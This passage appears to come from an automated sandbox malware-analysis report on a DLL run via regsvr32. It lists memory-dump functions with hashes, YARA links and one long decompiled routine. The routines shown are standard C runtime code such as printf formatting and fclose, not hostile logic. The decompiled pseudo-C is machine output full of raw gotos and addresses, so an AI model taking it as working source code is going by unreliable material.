                                                      • ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca, xrefs: 000007FEF9D2991D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: __free_lconv_mon__free_lconv_num
                                                      • String ID: ((ptloci->lc_category[category].wlocale != NULL) && (ptloci->lc_category[category].wrefcount != NULL)) || ((ptloci->lc_category[ca$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\localref.c
                                                      • API String ID: 2148069796-2706031433
                                                      • Opcode ID: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                      • Instruction ID: 7353ab124090f0710997c18079ef38eae00693e27689a0bfa21a481d68f00224
                                                      • Opcode Fuzzy Hash: 5530c5148454f32ed92c453347a6e128a1bc42f7b71ac9e6bc1d50a4750a2989
                                                      • Instruction Fuzzy Hash: F4A10E36A18A8581EB908F49E4853BEA3E0F3C4B54F665036EA8E477B5CFBED445C740
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D32772 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                      • API String ID: 2123368286-3717698799
                                                      • Opcode ID: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                      • Instruction ID: b28b411edc77ea5f57a42c4ce070c51137fe1cd7001121a3be123fc4e483bd38
                                                      • Opcode Fuzzy Hash: 1aafbfe16f86ccf21253850ca152cd04a8ee8357f57b5e583563c43112fb4b7a
                                                      • Instruction Fuzzy Hash: FC810D32A1DB8686DAB08B29E84476E73E0F385765F204225E6ED437E9DF3DD445CB01
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3C719 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 20%
                                                      			E000007FE7FEF9D3C719(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
				signed int _t212;
				signed char _t217;
				intOrPtr _t252;
				signed int _t327;
				signed int _t328;
				signed long long _t331;
				intOrPtr* _t354;
				signed long long _t379;

				_t327 = __rax;
				_a708 = 0x27;
				_a72 = 0x10;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
				_a84 = 0x30;
				_a85 = _a708 + 0x51;
				_a92 = 2;
				_a72 = 8;
				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
				asm("bts eax, 0x9");
				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t327;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
				E000007FE7FEF9D31EA0( &_a1112);
				_a824 = _t327;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000020) == 0) goto 0xf9d3c810;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c7f6;
				_t328 = E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				goto 0xf9d3c80e;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				goto 0xf9d3c84b;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c834;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				goto 0xf9d3c84b;
				E000007FE7FEF9D31E40( &_a1112);
				_a824 = _t328;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3c882;
				if (_a824 >= 0) goto 0xf9d3c882;
				_a832 =  ~_a824;
				asm("bts eax, 0x8");
				goto 0xf9d3c892;
				_t331 = _a824;
				_a832 = _t331;
				if ((_a80 & 0x00008000) != 0) goto 0xf9d3c8c7;
				if ((_a80 & 0x00001000) != 0) goto 0xf9d3c8c7;
				_a832 = _a832 & _t331;
				if (_a116 >= 0) goto 0xf9d3c8d8;
				_a116 = 1;
				goto 0xf9d3c8f5;
				_a80 = _a80 & 0xfffffff7;
				if (_a116 - 0x200 <= 0) goto 0xf9d3c8f5;
				_a116 = 0x200;
				if (_a832 != 0) goto 0xf9d3c908;
				_a92 = 0;
				_a64 =  &_a687;
				_t212 = _a116;
				_a116 = _a116 - 1;
				if (_t212 > 0) goto 0xf9d3c936;
				if (_a832 == 0) goto 0xf9d3c9d3;
				_a1040 = _a72;
				_a816 = _t212 / _a1040 + 0x30;
				_a1048 = _a72;
				if (_a816 - 0x39 <= 0) goto 0xf9d3c9b2;
				_t217 = _a816 + _a708;
				_a816 = _t217;
				 *_a64 = _a816 & 0x000000ff;
				_a64 = _a64 - 1;
				goto 0xf9d3c915;
				_a104 = _t217;
				_a64 = _a64 + 1;
				if ((_a80 & 0x00000200) == 0) goto 0xf9d3ca31;
				if (_a104 == 0) goto 0xf9d3ca12;
				if ( *_a64 == 0x30) goto 0xf9d3ca31;
				_a64 = _a64 - 1;
				 *_a64 = 0x30;
				_a104 = _a104 + 1;
				if (_a108 != 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000040) == 0) goto 0xf9d3ca95;
				if ((_a80 & 0x00000100) == 0) goto 0xf9d3ca63;
				_a84 = 0x2d;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000001) == 0) goto 0xf9d3ca7d;
				_a84 = 0x2b;
				_a92 = 1;
				goto 0xf9d3ca95;
				if ((_a80 & 0x00000002) == 0) goto 0xf9d3ca95;
				_a84 = 0x20;
				_a92 = 1;
				_a840 = _a88 - _a104 - _a92;
				if ((_a80 & 0x0000000c) != 0) goto 0xf9d3cad5;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				E000007FE7FEF9D3CF60(_a92, _a64,  &_a84, _a1088,  &_a688);
				if ((_a80 & 0x00000008) == 0) goto 0xf9d3cb27;
				if ((_a80 & 0x00000004) != 0) goto 0xf9d3cb27;
				E000007FE7FEF9D3CF10(0x30, _a840, _a1088,  &_a688);
				if (_a76 == 0) goto 0xf9d3cc1d;
				if (_a104 <= 0) goto 0xf9d3cc1d;
				_a872 = 0;
				_a848 = _a64;
				_a856 = _a104;
				_a856 = _a856 - 1;
				if (_a856 == 0) goto 0xf9d3cc1b;
				_a1056 =  *_a848 & 0x0000ffff;
				r9d = _a1056 & 0x0000ffff;
				r8d = 6;
				_a872 = E000007FE7FEF9D3B530( &_a860,  &_a864, _a1088);
				_a848 =  &(_a848[1]);
				if (_a872 != 0) goto 0xf9d3cbe5;
				if (_a860 != 0) goto 0xf9d3cbf2;
				_a688 = 0xffffffff;
				goto 0xf9d3cc1b;
				E000007FE7FEF9D3CF60(_a860,  &(_a848[1]),  &_a864, _a1088,  &_a688);
				goto 0xf9d3cb60;
				goto 0xf9d3cc3b;
				E000007FE7FEF9D3CF60(_a104,  &(_a848[1]), _a64, _a1088,  &_a688);
				if (_a688 < 0) goto 0xf9d3cc6e;
				if ((_a80 & 0x00000004) == 0) goto 0xf9d3cc6e;
				E000007FE7FEF9D3CF10(0x20, _a840, _a1088,  &_a688);
				if (_a96 == 0) goto 0xf9d3cc8e;
				0xf9d25330();
				_a96 = 0;
				goto 0xf9d3b99c;
				if (_a704 == 0) goto 0xf9d3ccb4;
				if (_a704 == 7) goto 0xf9d3ccb4;
				_a1060 = 0;
				goto 0xf9d3ccbf;
				_a1060 = 1;
				_t252 = _a1060;
				_a876 = _t252;
				if (_a876 != 0) goto 0xf9d3cd05;
				_t354 = L"((state == ST_NORMAL) || (state == ST_TYPE))";
				_a32 = _t354;
				r9d = 0;
				r8d = 0x8f5;
				0xf9d2b3b0();
				if (_t252 != 1) goto 0xf9d3cd05;
				asm("int3");
				if (_a876 != 0) goto 0xf9d3cd61;
				0xf9d2ab30();
				 *_t354 = 0x16;
				_a32 = 0;
				r9d = 0x8f5;
				E000007FE7FEF9D2BD70(L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
				_a912 = 0xffffffff;
				E000007FE7FEF9D26800( &_a120);
				goto 0xf9d3cd80;
				_a916 = _a688;
				E000007FE7FEF9D26800( &_a120);
				return E000007FE7FEF9D23280(_a916, 2, 2, _a1064 ^ _t379, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_64_amd64\\crt\\src\\output.c");
			}











                                                      0x7fef9d3c719
                                                      0x7fef9d3c719
                                                      0x7fef9d3c724
                                                      0x7fef9d3c737
                                                      0x7fef9d3c739
                                                      0x7fef9d3c748
                                                      0x7fef9d3c74c
                                                      0x7fef9d3c756
                                                      0x7fef9d3c769
                                                      0x7fef9d3c76f
                                                      0x7fef9d3c782
                                                      0x7fef9d3c78c
                                                      0x7fef9d3c791
                                                      0x7fef9d3c799
                                                      0x7fef9d3c7a9
                                                      0x7fef9d3c7b3
                                                      0x7fef9d3c7b8
                                                      0x7fef9d3c7c0
                                                      0x7fef9d3c7ce
                                                      0x7fef9d3c7d9
                                                      0x7fef9d3c7e8
                                                      0x7fef9d3c7ec
                                                      0x7fef9d3c7f4
                                                      0x7fef9d3c7fe
                                                      0x7fef9d3c806
                                                      0x7fef9d3c80e
                                                      0x7fef9d3c819
                                                      0x7fef9d3c823
                                                      0x7fef9d3c82a
                                                      0x7fef9d3c832
                                                      0x7fef9d3c83c
                                                      0x7fef9d3c843
                                                      0x7fef9d3c854
                                                      0x7fef9d3c85f
                                                      0x7fef9d3c86c
                                                      0x7fef9d3c878
                                                      0x7fef9d3c880
                                                      0x7fef9d3c882
                                                      0x7fef9d3c88a
                                                      0x7fef9d3c89d
                                                      0x7fef9d3c8aa
                                                      0x7fef9d3c8bf
                                                      0x7fef9d3c8cc
                                                      0x7fef9d3c8ce
                                                      0x7fef9d3c8d6
                                                      0x7fef9d3c8df
                                                      0x7fef9d3c8eb
                                                      0x7fef9d3c8ed
                                                      0x7fef9d3c8fe
                                                      0x7fef9d3c900
                                                      0x7fef9d3c910
                                                      0x7fef9d3c915
                                                      0x7fef9d3c91f
                                                      0x7fef9d3c925
                                                      0x7fef9d3c930
                                                      0x7fef9d3c93b
                                                      0x7fef9d3c95e
                                                      0x7fef9d3c96a
                                                      0x7fef9d3c997
                                                      0x7fef9d3c9a9
                                                      0x7fef9d3c9ab
                                                      0x7fef9d3c9bf
                                                      0x7fef9d3c9c9
                                                      0x7fef9d3c9ce
                                                      0x7fef9d3c9e0
                                                      0x7fef9d3c9ec
                                                      0x7fef9d3c9fc
                                                      0x7fef9d3ca03
                                                      0x7fef9d3ca10
                                                      0x7fef9d3ca1a
                                                      0x7fef9d3ca24
                                                      0x7fef9d3ca2d
                                                      0x7fef9d3ca36
                                                      0x7fef9d3ca45
                                                      0x7fef9d3ca52
                                                      0x7fef9d3ca54
                                                      0x7fef9d3ca59
                                                      0x7fef9d3ca61
                                                      0x7fef9d3ca6c
                                                      0x7fef9d3ca6e
                                                      0x7fef9d3ca73
                                                      0x7fef9d3ca7b
                                                      0x7fef9d3ca86
                                                      0x7fef9d3ca88
                                                      0x7fef9d3ca8d
                                                      0x7fef9d3caa5
                                                      0x7fef9d3cab5
                                                      0x7fef9d3cad0
                                                      0x7fef9d3caee
                                                      0x7fef9d3cafc
                                                      0x7fef9d3cb07
                                                      0x7fef9d3cb22
                                                      0x7fef9d3cb2c
                                                      0x7fef9d3cb37
                                                      0x7fef9d3cb3d
                                                      0x7fef9d3cb4d
                                                      0x7fef9d3cb59
                                                      0x7fef9d3cb70
                                                      0x7fef9d3cb79
                                                      0x7fef9d3cb8a
                                                      0x7fef9d3cb92
                                                      0x7fef9d3cb9b
                                                      0x7fef9d3cbb6
                                                      0x7fef9d3cbc9
                                                      0x7fef9d3cbd9
                                                      0x7fef9d3cbe3
                                                      0x7fef9d3cbe5
                                                      0x7fef9d3cbf0
                                                      0x7fef9d3cc11
                                                      0x7fef9d3cc16
                                                      0x7fef9d3cc1b
                                                      0x7fef9d3cc36
                                                      0x7fef9d3cc43
                                                      0x7fef9d3cc4e
                                                      0x7fef9d3cc69
                                                      0x7fef9d3cc74
                                                      0x7fef9d3cc80
                                                      0x7fef9d3cc85
                                                      0x7fef9d3cc8e
                                                      0x7fef9d3cc9b
                                                      0x7fef9d3cca5
                                                      0x7fef9d3cca7
                                                      0x7fef9d3ccb2
                                                      0x7fef9d3ccb4
                                                      0x7fef9d3ccbf
                                                      0x7fef9d3ccc6
                                                      0x7fef9d3ccd5
                                                      0x7fef9d3ccd7
                                                      0x7fef9d3ccde
                                                      0x7fef9d3cce3
                                                      0x7fef9d3cce6
                                                      0x7fef9d3ccf8
                                                      0x7fef9d3cd00
                                                      0x7fef9d3cd02
                                                      0x7fef9d3cd0d
                                                      0x7fef9d3cd0f
                                                      0x7fef9d3cd14
                                                      0x7fef9d3cd1a
                                                      0x7fef9d3cd23
                                                      0x7fef9d3cd3e
                                                      0x7fef9d3cd43
                                                      0x7fef9d3cd53
                                                      0x7fef9d3cd5f
                                                      0x7fef9d3cd68
                                                      0x7fef9d3cd74
                                                      0x7fef9d3cd97

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: get_int64_arg
                                                      • String ID: '$0$9
                                                      • API String ID: 1967237116-269856862
                                                      • Opcode ID: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                      • Instruction ID: b3eda79bc04a60fb7ee4a4011f7c31915f3bf9e4e3688118cbdbb277fe6e384d
                                                      • Opcode Fuzzy Hash: 83c439eea7fc9ce93bcb821b911d608e7d80de2d13083439c5735137d4fc31ad
                                                      • Instruction Fuzzy Hash: 0D41B47260DAC187E7B58B19E8957AEB7E4F385791F100125EAC886B98DB7DE640CF00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D35260 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Frame$CreateDestroyedExceptionFindInfoObjectUnlink
                                                      • String ID: csm
                                                      • API String ID: 2005287440-1018135373
                                                      • Opcode ID: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                      • Instruction ID: 0432dbe60f42fc154ce83aeddd16286c3d94edaaa77ff7db33c77853d76fe5a2
                                                      • Opcode Fuzzy Hash: 4c556ceed80f2aba1954f9041ed191ad0fbab56fa1f8ad9f2457e70616e7d401
                                                      • Instruction Fuzzy Hash: FB51A836608B8682DAA09B1AF49076E77E0F3C4B91F615125EBCD47BB5DF3AD444CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D28040 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: FileModuleName__initmbctable
                                                      • String ID: C:\Windows\System32\regsvr32.exe$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdargv.c
                                                      • API String ID: 3548084100-1254873407
                                                      • Opcode ID: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                      • Instruction ID: 40487cdd99e7390fc7cfa00da240fffb72a0e4e16c6d4a8cb9187a6270b67cf4
                                                      • Opcode Fuzzy Hash: d38f4fd9cb9ecdd73cd32345429acc70b773e7a180fa8c1b1693dc69edd9f2e5
                                                      • Instruction Fuzzy Hash: 09410C21A19A8281EA90CB19EC8136E77A0F7857A5F614626E6EE43BF4DF3ED144C701
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D328E8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: ("Buffer too small", 0)$_vsnprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c
                                                      • API String ID: 2123368286-3717698799
                                                      • Opcode ID: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                      • Instruction ID: db9b60f6e9b20c9f37adeee518bf084cd0881f5c38580f5bd04c1ce4cfd39116
                                                      • Opcode Fuzzy Hash: 65def78894184635a726d36e54dfff1a0241531dd31d36ef72262bf6a1fca492
                                                      • Instruction Fuzzy Hash: 49412931E1C7868AEAB08B24E84476E62E0F385365F604335D6ED427E5CB3EE444CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D27816 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalFileInitializeSectionSpinType_calloc_dbg_calloc_dbg_impl
                                                      • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\ioinit.c
                                                      • API String ID: 2306298712-3864165772
                                                      • Opcode ID: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                      • Instruction ID: b637de57708ed2c7d115ffe7a667dd769ed1fe34c6e506efeb830bf347bff847
                                                      • Opcode Fuzzy Hash: 6db4822cd77f1ed37bef3fea8eb09d36478b9c501087b185a6ab49f69a42b384
                                                      • Instruction Fuzzy Hash: D8313D32609BC585E7B08B19E84076EB3E1F385764F618225CAED877E4DB3DE405CB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D37F0E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: _wcstombs_s_l$bufferSize <= INT_MAX$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wcstombs.c
                                                      • API String ID: 2123368286-2562677240
                                                      • Opcode ID: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                      • Instruction ID: c85490607768c44f9eb9442c12c0ad7794bb5914cb74fa2bef1d73063ee62390
                                                      • Opcode Fuzzy Hash: dabd10d16ebe11174fc63b9f89b539a3b240949ad9ffb505f617c08bbd3ff20b
                                                      • Instruction Fuzzy Hash: 67311632A0DB8685EAB09B15E8407AEB7E1F385390F204625D6DD43BE8DB7ED444CB02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D40680 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter$__doserrno
                                                      • String ID: (str != NULL)$_fclose_nolock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c
                                                      • API String ID: 1181141450-2845860089
                                                      • Opcode ID: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                      • Instruction ID: a2d3a4357c877c10dbeba88c1570b3bcf2b7b0db3c51835aaf51b50bd6ce4727
                                                      • Opcode Fuzzy Hash: 7bab6b588e6dd2839569b0ca5fa95970036134ebeeb6453b58b8f029525d0fe5
                                                      • Instruction Fuzzy Hash: 25316D36A28A4286E7909B19E88476E77E0F380794F205125F6CE477F5CB7ED841CF42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D3AB10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_isatty$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\isatty.c
                                                      • API String ID: 2123368286-160817255
                                                      • Opcode ID: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                      • Instruction ID: f81691e69628683e8e3df4f52d5e63bc79cedec177f2501b48199eede19b8a9f
                                                      • Opcode Fuzzy Hash: 20bce409a33f2d52ae5b3246709d5cabe66b407105c41d1953a7685d10f1773e
                                                      • Instruction Fuzzy Hash: 7E218E71B2D6428AE7D89B24EC8476DB3E1F390395F609635E1DE476E4D77ED4018B00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000007FEF9D40580 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter
                                                      • String ID: (stream != NULL)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\fclose.c$fclose
                                                      • API String ID: 2123368286-3409824857
                                                      • Opcode ID: b4902cc461c388e31b4dcd0307079e4da2555ab755984697fa072277fbec1f80
